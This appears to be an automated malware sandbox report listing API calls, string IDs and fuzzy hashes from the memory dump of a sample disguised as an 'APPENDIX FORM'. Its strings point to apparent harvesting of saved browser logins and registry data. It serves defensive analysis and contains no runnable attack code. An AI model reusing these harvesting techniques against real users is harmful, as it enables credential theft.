                                                                                                              • EndDialog.USER32(?,00000002), ref: 00405C83
                                                                                                              • EndDialog.USER32(?,00000001), ref: 00405C98
                                                                                                                • Part of subcall function 00405942: GetDlgItem.USER32(?,000003E9), ref: 0040594F
                                                                                                                • Part of subcall function 00405942: GetDlgItemInt.USER32(?,000003ED,00000000,00000000), ref: 00405964
                                                                                                              • SendDlgItemMessageW.USER32(?,000003ED,000000C5,00000003,00000000), ref: 00405CB0
                                                                                                              • SetDlgItemInt.USER32(?,000003ED,?,00000000), ref: 00405DC1
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Item$Dialog$MessageSend
                                                                                                              • String ID:
                                                                                                              • API String ID: 3975816621-0
                                                                                                              • Opcode ID: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                              • Instruction ID: f402ee7b04c6f37fed0081192b7321ff61b10a2f1b35431ffb531e22b2ae6a97
                                                                                                              • Opcode Fuzzy Hash: 7732dd923fe157b610bb283d6cbae8fba396a65a3534e092655bb2fc554de655
                                                                                                              • Instruction Fuzzy Hash: CC61C130214B05ABEB21AF25C886A2BB7B9FF40314F00C63EF515A76D1D778A980CF59
                                                                                                              APIs
                                                                                                              • _wcsicmp.MSVCRT ref: 00444D09
                                                                                                              • _wcsicmp.MSVCRT ref: 00444D1E
                                                                                                              • _wcsicmp.MSVCRT ref: 00444D33
                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                                • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                                • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _wcsicmp$wcslen$_memicmp
                                                                                                              • String ID: .save$http://$https://$log profile$signIn
                                                                                                              • API String ID: 1214746602-2708368587
                                                                                                              • Opcode ID: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                              • Instruction ID: a06b7041105a35739b636013fb05be6f811b580b4b6be30494b1fb5d54fb6444
                                                                                                              • Opcode Fuzzy Hash: eb43a17493a81dd81a499902e520f22142985c343e331a56dc5f09596e4914e7
                                                                                                              • Instruction Fuzzy Hash: CF41E6F25047018AF730AA65988176773C8DBD4329F20893FE466E27C3DB7CE841451D
                                                                                                              APIs
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(0000000C), ref: 00405DE1
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00405DFD
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E23
                                                                                                              • memset.MSVCRT ref: 00405E33
                                                                                                              • ??2@YAPAXI@Z.MSVCRT(00000000,?), ref: 00405E62
                                                                                                              • InvalidateRect.USER32(?,00000000,00000000,?,?,?,?), ref: 00405EAF
                                                                                                              • SetFocus.USER32(?,?,?,?), ref: 00405EB8
                                                                                                              • ??3@YAXPAX@Z.MSVCRT(?,?), ref: 00405EC8
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ??2@$??3@$FocusInvalidateRectmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 2313361498-0
                                                                                                              • Opcode ID: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                              • Instruction ID: b0df241c53c05d00948b57b0581abff4a91b8671001b7eb205ccc6b71985861b
                                                                                                              • Opcode Fuzzy Hash: 714c78ee16b9d0c535b2ccd9b722d7140f358af2491426836a426c957dcc8526
                                                                                                              • Instruction Fuzzy Hash: F231C1B1500601AFEB249F6AD88692AB7A8FF14344B11853FF545E72A0DB38ED90CFD4
                                                                                                              APIs
                                                                                                              • GetClientRect.USER32(?,?), ref: 00405F65
                                                                                                              • GetWindow.USER32(?,00000005), ref: 00405F7D
                                                                                                              • GetWindow.USER32(00000000), ref: 00405F80
                                                                                                                • Part of subcall function 00401739: GetWindowRect.USER32(?,?), ref: 00401748
                                                                                                              • GetWindow.USER32(00000000,00000002), ref: 00405F8C
                                                                                                              • GetDlgItem.USER32(?,0000040C), ref: 00405FA2
                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 00405FE1
                                                                                                              • GetDlgItem.USER32(?,0000040E), ref: 00405FEB
                                                                                                              • SendMessageW.USER32(00000000,00000160,0000015E,00000000), ref: 0040603A
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Window$ItemMessageRectSend$Client
                                                                                                              • String ID:
                                                                                                              • API String ID: 2047574939-0
                                                                                                              • Opcode ID: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                              • Instruction ID: 7069056512839d5548a4ade768bb81bcd5f8c043aef79b83aaef118172e1f21b
                                                                                                              • Opcode Fuzzy Hash: e98f1b8ec4c98c4b3f876b541513d14ca347a33c497b9d7b5490fbbe5922d292
                                                                                                              • Instruction Fuzzy Hash: 3421A4B1B4070977E60137629C47F7B666CEF95718F04003AFB007F1C2DABA5C0649A9
                                                                                                              APIs
                                                                                                              • GetSystemTime.KERNEL32(?), ref: 00418836
                                                                                                              • memcpy.MSVCRT(?,?,00000010), ref: 00418845
                                                                                                              • GetCurrentProcessId.KERNEL32 ref: 00418856
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418869
                                                                                                              • GetTickCount.KERNEL32 ref: 0041887D
                                                                                                              • memcpy.MSVCRT(?,?,00000004), ref: 00418890
                                                                                                              • QueryPerformanceCounter.KERNEL32(?), ref: 004188A6
                                                                                                              • memcpy.MSVCRT(?,?,00000008), ref: 004188B6
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                                                                              • String ID:
                                                                                                              • API String ID: 4218492932-0
                                                                                                              • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                              • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                                                                              • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                                                                              • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                                                                              APIs
                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                                                                                • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,00000000,?,?,00000000,?,?,00000000), ref: 0044A75D
                                                                                                                • Part of subcall function 0044A6E0: memcpy.MSVCRT(?,?,?,?,?,00000000,?,?,00000000), ref: 0044A7AA
                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A8BF
                                                                                                              • memcpy.MSVCRT(?,?,00000004,00000000), ref: 0044A90C
                                                                                                              • memcpy.MSVCRT(?,?,00000040), ref: 0044A988
                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000040,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A422
                                                                                                                • Part of subcall function 0044A3F0: memcpy.MSVCRT(?,0044A522,00000008,?,?,?,0044A522,?,?,?,?,0044A93F,?,?,?,00000000), ref: 0044A46E
                                                                                                              • memcpy.MSVCRT(?,?,00000000), ref: 0044A9D8
                                                                                                              • memcpy.MSVCRT(?,?,00000020,?,?,?,?,00000000), ref: 0044AA19
                                                                                                              • memcpy.MSVCRT(00000000,?,00000020,?,?,?,?,?,?,?,00000000), ref: 0044AA4A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy$memset
                                                                                                              • String ID: gj
                                                                                                              • API String ID: 438689982-4203073231
                                                                                                              • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                              • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                                                                              • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                                                                              • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                                                                              APIs
                                                                                                              • memcpy.MSVCRT(00000000,?,00000000,00000000,00000000), ref: 00430D77
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpy
                                                                                                              • String ID: $, $CREATE TABLE $h\E$h\E$t\El\E
                                                                                                              • API String ID: 3510742995-2446657581
                                                                                                              • Opcode ID: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                              • Instruction ID: 6ffa86bec377aa4089670d2183b3ec09711c7f982517375fcd2495ffcd0e8f65
                                                                                                              • Opcode Fuzzy Hash: 14c264379a519ee19885d409f26ecc6e2d490775587d859f835060da74a6389d
                                                                                                              • Instruction Fuzzy Hash: CE51CF71D00219DFCB10CF99C490AAEB7F5EF89319F21925BD841AB206D738AE45CF98
                                                                                                              APIs
                                                                                                              • GetDlgItem.USER32(?,000003E9), ref: 00405A25
                                                                                                              • SendMessageW.USER32(00000000,00001009,00000000,00000000), ref: 00405A3E
                                                                                                              • SendMessageW.USER32(?,00001036,00000000,00000026), ref: 00405A4B
                                                                                                              • SendMessageW.USER32(?,0000101C,00000000,00000000), ref: 00405A57
                                                                                                              • memset.MSVCRT ref: 00405ABB
                                                                                                              • SendMessageW.USER32(?,0000105F,?,?), ref: 00405AF0
                                                                                                              • SetFocus.USER32(?), ref: 00405B76
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: MessageSend$FocusItemmemset
                                                                                                              • String ID:
                                                                                                              • API String ID: 4281309102-0
                                                                                                              • Opcode ID: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                              • Instruction ID: 6f3680249e95162a2c17081b35fa045d6cf646e1ea5253f38cdaf521fbeb1c86
                                                                                                              • Opcode Fuzzy Hash: 2f4c27367ad0dcd0df6ff95742fdfb823844e6920604fec48c7e171fffcef4b8
                                                                                                              • Instruction Fuzzy Hash: 86414B75900219BBDB20DF95CC85EAFBFB8FF04754F10406AF508A6291D3759A90CFA4
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _snwprintfwcscat
                                                                                                              • String ID: &nbsp;$<td bgcolor=#%s nowrap>%s$<td bgcolor=#%s>%s$<tr>
                                                                                                              • API String ID: 384018552-4153097237
                                                                                                              • Opcode ID: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                              • Instruction ID: 690b9c6e7bf42a1b777b65718bd5b5c6a61f2cd8039d9a9c88f4ff4500a270e2
                                                                                                              • Opcode Fuzzy Hash: ceefa94603245cfdc84b5d7ac4d3bb9d057f1e5f82a05c255ee601070e84ce5a
                                                                                                              • Instruction Fuzzy Hash: D8319E31A00209AFDF14AF55CC86AAE7BB5FF45320F10007AE804AB292D775AE49DB94
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ItemMenu$CountInfomemsetwcschr
                                                                                                              • String ID: 0$6
                                                                                                              • API String ID: 2029023288-3849865405
                                                                                                              • Opcode ID: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                              • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                                                                              • Opcode Fuzzy Hash: a1397ef96222afd124a0cc802277b776f8ca8d8a268962530e532de87b957585
                                                                                                              • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                                                                              APIs
                                                                                                                • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                                                                              • memset.MSVCRT ref: 00405455
                                                                                                              • memset.MSVCRT ref: 0040546C
                                                                                                              • memset.MSVCRT ref: 00405483
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00405498
                                                                                                              • memcpy.MSVCRT(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 004054AD
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
Similarity
• API ID: memset$memcpy$ErrorLast
• String ID: 6$\
• API String ID: 404372293-1284684873
APIs
• FileTimeToSystemTime.KERNEL32(?,?), ref: 0040A088
• GetDateFormatW.KERNEL32(00000400,00000001,000007C1,00000000,?,00000080), ref: 0040A0B4
• GetTimeFormatW.KERNEL32(00000400,00000000,000007C1,00000000,?,00000080), ref: 0040A0C9
• wcscpy.MSVCRT ref: 0040A0D9
• wcscat.MSVCRT ref: 0040A0E6
• wcscat.MSVCRT ref: 0040A0F5
• wcscpy.MSVCRT ref: 0040A107
Similarity
• API ID: Time$Formatwcscatwcscpy$DateFileSystem
• String ID:
• API String ID: 1331804452-0
APIs
  • Part of subcall function 0040440C: FreeLibrary.KERNEL32(?,0040436D,00000000,00000000,?,0040BDCC,?,00000000,?), ref: 00404414
  • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
  • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(C:\Windows\system32,00000104), ref: 0040A841
  • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
  • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
  • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000), ref: 0040A87B
  • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
• GetProcAddress.KERNEL32(?,00000000), ref: 00404398
• GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
• GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
• GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
• GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
Strings
Similarity
• API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
• String ID: advapi32.dll
• API String ID: 2012295524-4050573280
APIs
Strings
• <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 00410083
• <%s>, xrefs: 004100A6
• <?xml version="1.0" ?>, xrefs: 0041007C
Similarity
• API ID: memset$_snwprintf
• String ID: <%s>$<?xml version="1.0" ?>$<?xml version="1.0" encoding="ISO-8859-1" ?>
• API String ID: 3473751417-2880344631
APIs
Strings
Similarity
• API ID: wcscat$_snwprintfmemset
• String ID: %2.2X
• API String ID: 2521778956-791839006
APIs
Strings
Similarity
• API ID: _snwprintfwcscpy
• String ID: dialog_%d$general$menu_%d$strings
• API String ID: 999028693-502967061
APIs
• strlen.MSVCRT ref: 00408DFA
  • Part of subcall function 00408D18: memcpy.MSVCRT(?,?,00000008,00000008,00000010,00000040,?,?), ref: 00408D44
• memset.MSVCRT ref: 00408E46
• memcpy.MSVCRT(00000000,?,?,00000000,00000000,00000000), ref: 00408E59
• memcpy.MSVCRT(?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408E6C
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,?,?,00000000,?,00000000,00000000,?,00000000), ref: 00408EB2
• memcpy.MSVCRT(?,?,?,00000000,?,00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 00408EC5
• memcpy.MSVCRT(00000000,00000000,00000014,?,00000000,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408EF2
• memcpy.MSVCRT(?,00000000,00000014,00000000,00000060,00000000,?,?,?,00000000,?,00000000), ref: 00408F07
Similarity
• API ID: memcpy$memsetstrlen
• String ID:
• API String ID: 2350177629-0
APIs
Strings
Similarity
• API ID: memset
• String ID: 8$GROUP$ORDER$a GROUP BY clause is required before HAVING$aggregate functions are not allowed in the GROUP BY clause
• API String ID: 2221118986-1606337402
APIs
• _mbscpy.MSVCRT(?,00000000,00000000,?,00000001), ref: 00408F50
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,?,?,00000010,?,00000000,?,00000001), ref: 00408FB3
• memset.MSVCRT ref: 00408FD4
• memcmp.MSVCRT(?,?,00000010,0040951D,?,?,00000010,?,00000000,?,00000001), ref: 00409025
• memset.MSVCRT ref: 00409042
• memcpy.MSVCRT(?,?,00000018,00000001,?,?,00000020,?,?,?,?,00000000,?,00000001), ref: 00409079
  • Part of subcall function 00408C3C: strlen.MSVCRT ref: 00408C96
Similarity
• API ID: memcmpmemset$_mbscpymemcpystrlen
• String ID:
• API String ID: 265355444-0
APIs
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
  • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
  • Part of subcall function 00414592: RegOpenKeyExW.KERNELBASE(80000002,80000002,00000000,00020019,80000002,00414CC1,80000002,Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders,00445DDE,?,?,00000000), ref: 004145A5
  • Part of subcall function 0040A9CE: free.MSVCRT ref: 0040A9DD
• memset.MSVCRT ref: 0040C439
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
• _wcsupr.MSVCRT ref: 0040C481
  • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
  • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
  • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000001,?,00000000,?,?,0040AD76,?,000000FF), ref: 0040A94F
• memset.MSVCRT ref: 0040C4D0
• RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
• RegCloseKey.ADVAPI32(?,?,?,?,?,00000000,?), ref: 0040C508
Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: free$EnumValuememset$CloseOpen_wcsuprmemcpywcslen
                                                                                                              • String ID:
                                                                                                              • API String ID: 4131475296-0
                                                                                                              • Opcode ID: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                              • Instruction ID: d2440758a7fd93b52fc88bd6111275bc9aa4df1ffeb01c53d5483546710cd2f3
                                                                                                              • Opcode Fuzzy Hash: f8fc55ba245d1c9f6a3ba6cb2a4711690556c3657263a09b0baeb8372baa9e99
                                                                                                              • Instruction Fuzzy Hash: A4411CB2900219BBDB00EF95DC85EEFB7BCAF48304F10417AB505F6191D7749A44CBA5
                                                                                                              APIs
                                                                                                              • memset.MSVCRT ref: 004116FF
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D173
                                                                                                                • Part of subcall function 0040D134: LoadStringW.USER32(00000000,0000000A,00000FFF,?), ref: 0040D20C
                                                                                                                • Part of subcall function 0040D134: memcpy.MSVCRT(00000000,00000002), ref: 0040D24C
                                                                                                                • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,?,0040EBBF,?,004126A8,00000000,00000000,?), ref: 0040D1E1
                                                                                                                • Part of subcall function 0040A45A: memset.MSVCRT ref: 0040A47B
                                                                                                                • Part of subcall function 0040A45A: _snwprintf.MSVCRT ref: 0040A4AE
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4BA
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4D2
                                                                                                                • Part of subcall function 0040A45A: wcslen.MSVCRT ref: 0040A4E0
                                                                                                                • Part of subcall function 0040A45A: memcpy.MSVCRT(?,?,?,?,?,?,?,?,?,00000400,%s (%s),?,?), ref: 0040A4F3
                                                                                                                • Part of subcall function 0040A279: wcscpy.MSVCRT ref: 0040A2DF
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_8_2_400000_APPENDIX FORM_N#U00b045013-20241120.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: memcpywcslen$HandleModulememsetwcscpy$LoadString_snwprintf
                                                                                                              • String ID: *.csv$*.htm;*.html$*.txt$*.xml$txt
                                                                                                              • API String ID: 2618321458-3614832568
                                                                                                              • Opcode ID: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                              • Instruction ID: 2af34abd3473d77be096866f654b5876edf67c2d942e61680e34910f62553c8c
                                                                                                              • Opcode Fuzzy Hash: 9944a9292e2920dba3aaf51766bf3ae0805637ffbeb5ceac454ead9757247a29
                                                                                                              • Instruction Fuzzy Hash: 71310DB1D013589BDB10EFA9DC816DDBBB4FB08345F10407BE548BB282DB385A468F99
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000008.00000002.1985341619.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000459000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.000000000045D000.00000040.80000000.00040000.00000000.sdmp
                                                                                                              • Associated: 00000008.00000002.1985341619.0000000000473000.00000040.80000000.00040000.00000000.sdmp
